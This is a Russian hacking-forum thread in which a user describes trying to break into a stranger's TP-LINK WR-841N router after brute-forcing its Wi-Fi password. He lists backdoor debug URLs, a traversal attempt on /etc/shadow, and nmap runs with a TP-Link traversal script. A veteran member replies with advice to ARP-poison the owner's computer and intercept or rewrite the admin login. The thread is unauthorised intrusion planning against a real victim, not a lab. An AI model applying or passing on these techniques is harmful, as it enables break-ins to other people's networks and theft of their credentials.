Вопросы по роутеру 2

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by sol_omol, 14 Jun 2017.

  1. sol_omol

    sol_omol New Member

    Joined:
    4 Jun 2017
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Предыдущий тред: https://forum.antichat.ru/threads/452281/
    Здравствуйте.
    Итак, потыкался сегодня Ривером в точку, отправлявшую WSC-NACK после пакета M2. Так и отправляет. Видимо точка заблокировала WPS фактически навсегда (когда-то еще ресет на ней ткнут). Придется идти другим путем.

    Есть еще кое-какие вопросы по совершенно другой точке, надеюсь вы мне поможете.
    Текущая задача - пробиться в веб-морду роутера TP-LINK WR-841N.
    Физического доступа к роутеру нет, но есть возможность подключаться к нему по WAN во внутреннюю сеть (пароль я сбрутил пару недель назад).
    Роутер после каждых 10 попыток залезть в веб-морду закрывается на два часа.
    Итак, я погуглил существующие уязвимости и реализующий их софт конкретно для этого роутера.
    Вышло вот что.
    Во-первых, веб-закладки:
    192.168.0.1/userRpmNatDebugRpm26525557/linux_cmdline.html
    Шелл, позволяющий утащить файлы из роутеров WR-841N и некоторых еще. Доступ к нему без авторизации невозможен. Не подходит, так как у меня нет возможности авторизоваться (routerscan под винду ничего не дал, admin-admin, admin-password, osteam-5up, admin-1234 и прочие тоже ничего, гидрой брутить имхо нет смысла, см.выше ограничение на попытки).

    192.168.0.1/rom-0
    Это я подсмотрел в хацкерском видео с ютуба, где взламывали такой же роутер. В моем случае попытка сюда зайти перенаправляет на форму авторизации. Опять-таки не то.

    192.168.0.1/userRpmNatDebugRpm26525557/start_art.html
    При попытке сюда зайти роутер должен в ответ поискать на моем компьютере сервер TFTP, скачать оттуда файл nart.out и запустить с root-правами. Если сервера на моем компьютере нет, точка должна самоурониться. Итак, я попробовал эту вещичку и точка не уронилась. Видимо не работает.

    192.168.0.1/ ../ ../etc/shadow и прочие вариации / ../.
    "You have no authority to access this router!". При попытке зайти из внутренней сети то же самое.
    При попытке выставить во внутренней сети статический адрес 192.168.0.66 (в интернете говорят что это помогает) - то же самое. Не то.

    Во-вторых, арсенал Kali:
    NMap со скриптом:
    1. Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2017-06-13 18:00 EDT
    2. Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
    3. Nmap done: 1 IP address (0 hosts up) scanned in 4.46 seconds
    4. root@mol:~# nmap 000.000.000.000 -p 8080 --script http-tplink-dir-traversal.nse -Pn

    5. Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2017-06-13 18:00 EDT
    6. Nmap scan report for 000.000.000.000
    7. Host is up (0.0054s latency).
    8. PORT STATE SERVICE
    9. 8080/tcp open http-proxy

    10. Nmap done: 1 IP address (1 host up) scanned in 0.31 seconds
    11. root@mol:~# nmap 000.000.000.000 -p 8080 --script +http-tplink-dir-traversal.nse -Pn

    12. Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2017-06-13 18:00 EDT
    13. Nmap scan report for 000.000.000.000
    14. Host is up (0.0060s latency).
    15. PORT STATE SERVICE
    16. 8080/tcp open http-proxy

    17. Nmap done: 1 IP address (1 host up) scanned in 0.26 seconds
    18. root@mol:~# nmap 000.000.000.000 -p 8080 --script +http-tplink-dir-traversal.nse -d -Pn

    19. Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2017-06-13 18:01 EDT
    20. --------------- Timing report ---------------
    21. hostgroups: min 1, max 100000
    22. rtt-timeouts: init 1000, min 100, max 10000
    23. max-scan-delay: TCP 1000, UDP 1000, SCTP 1000
    24. parallelism: min 0, max 0
    25. max-retries: 10, host-timeout: 0
    26. min-rate: 0, max-rate: 0
    27. ---------------------------------------------
    28. NSE: Using Lua 5.2.
    29. NSE: Arguments from CLI:
    30. NSE: Loaded 1 scripts for scanning.
    31. NSE: Script Pre-scanning.
    32. NSE: Starting runlevel 1 (of 1) scan.
    33. Initiating NSE at 18:01
    34. Completed NSE at 18:01, 0.00s elapsed
    35. mass_rdns: Using DNS server 192.168.1.1
    36. Initiating Parallel DNS resolution of 1 host. at 18:01
    37. mass_rdns: 0.00s 0/1 [#: 1, OK: 0, NX: 0, DR: 0, SF: 0, TR: 1]
    38. Completed Parallel DNS resolution of 1 host. at 18:01, 0.00s elapsed
    39. DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
    40. Initiating SYN Stealth Scan at 18:01
    41. Scanning 000.000.000.000 [1 port]
    42. Packet capture filter (device wlan0): dst host 192.168.1.38 and (icmp or icmp6 or ((tcp or udp or sctp) and (src host 000.000.000.000)))
    43. Completed SYN Stealth Scan at 18:01, 2.01s elapsed (1 total ports)
    44. Overall sending rates: 1.00 packets / s, 43.84 bytes / s.
    45. NSE: Script scanning 000.000.000.000.
    46. NSE: Starting runlevel 1 (of 1) scan.
    47. Initiating NSE at 18:01
    48. Completed NSE at 18:01, 0.00s elapsed
    49. Nmap scan report for 000.000.000.000
    50. Host is up, received user-set.
    51. Scanned at 2017-06-13 18:01:01 EDT for 2s
    52. PORT STATE SERVICE REASON
    53. 8080/tcp filtered http-proxy no-response

    54. NSE: Script Post-scanning.
    55. NSE: Starting runlevel 1 (of 1) scan.
    56. Initiating NSE at 18:01
    57. Completed NSE at 18:01, 0.00s elapsed
    58. Read from /usr/bin/../share/nmap: nmap-payloads nmap-services.
    59. Nmap done: 1 IP address (1 host up) scanned in 2.31 seconds
    60. Raw packets sent: 2 (88B) | Rcvd: 0 (0B)

    Скрипт вроде бы работает, только я не понимаю как и что мне делать для несколько более конкретных результатов. Странно что он согласился работать только после "плюсика".

    Ну и в-третьих потыкался метасплоитом и routersploit'ом, ну возможности обоих в отношении роутеров которые не дилинк довольно скромны. Безрезультатно.

    Вопросы таковы:
    1. Как заставить работать скрипт http-tplink-dir-traversal.nse?
    2. Можно ли чем-то сбрутить веб-морду при существующих ограничениях, в обход их?


    Далее, слегка насторожило поведение роутера. Последние дни я в него тыкался своими инструментами, а сегодня он внезапно в течение суток:
    - сначала сменил порт веб-морды с 8080 на 80. Было ip:8080, cтало ip:80. Я сначала подумал что роутер лег, но не тут-то было. Просто порт сменил. Кто это сделал - роутер или хозяин? Из-за бага или намеренно?
    - перезагрузился. Затем получил от провайдера новый адрес по DHCP (старая российская схема, когда компьютеры соединены в локалку со статическими адресами-шлюзами и поверх этой локалки если нужен интернет устанавливается VPN с логином-паролем и адресом DHCP) и соответственно старый контакт оборвался. Пришлось опять внешний его адрес узнавать.
    У меня работал батник на основной системе (винда соответственно), пинговавший старый адрес раз в десять минут. Порт с 8080 на 80 роутер сменил в промежутке между этой ночью и этим полуднем, а перезагрузился (ну мне кажется что он перезагрузился, суть в том что он переподключился по VPN к провайдеру) в промежутке между 23:05 и 23:15. Есть идеи отчего это произошло? Я его не дудосил, и с хозяином точки не пересекался =)
    И еще капельку смутило что NMap без -Pn не желал признавать существование точки, хотя виндовой пинг исправно работал и работает. Ну это ладно.

    Всем спасибо за помощь.
     
  2. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    По порядку:
    1. Traversal эксплойты везде одинаковы, и в случае TP-Link ими можно лишь получить Wi-Fi параметры - в Router Scan они все уже есть, смысла пробовать Nmap-скрипт нет
    2. Порт веб интерфейса мог сменить лишь администратор роутера
    3. Поскольку у вас есть возможность находиться внутри сети, устройте ARP Poison атаку на комп админа, и спровоцируйте его зайти на роутер - это единственный способ получить пароль

    Примечание: Последняя версия прошивок для TP-Link (как раз та, что блокируется на 2 часа) отправляет форму входа связкой login:base64(md5(password)). После перехвата пароль придётся ещё брутить. Но тем же MITMом это дело можно упростить, переписав скрипт логина (но тут нужен определённый скилл).
     
    Alexan007, sol_omol and Triton_Mgn like this.
Loading...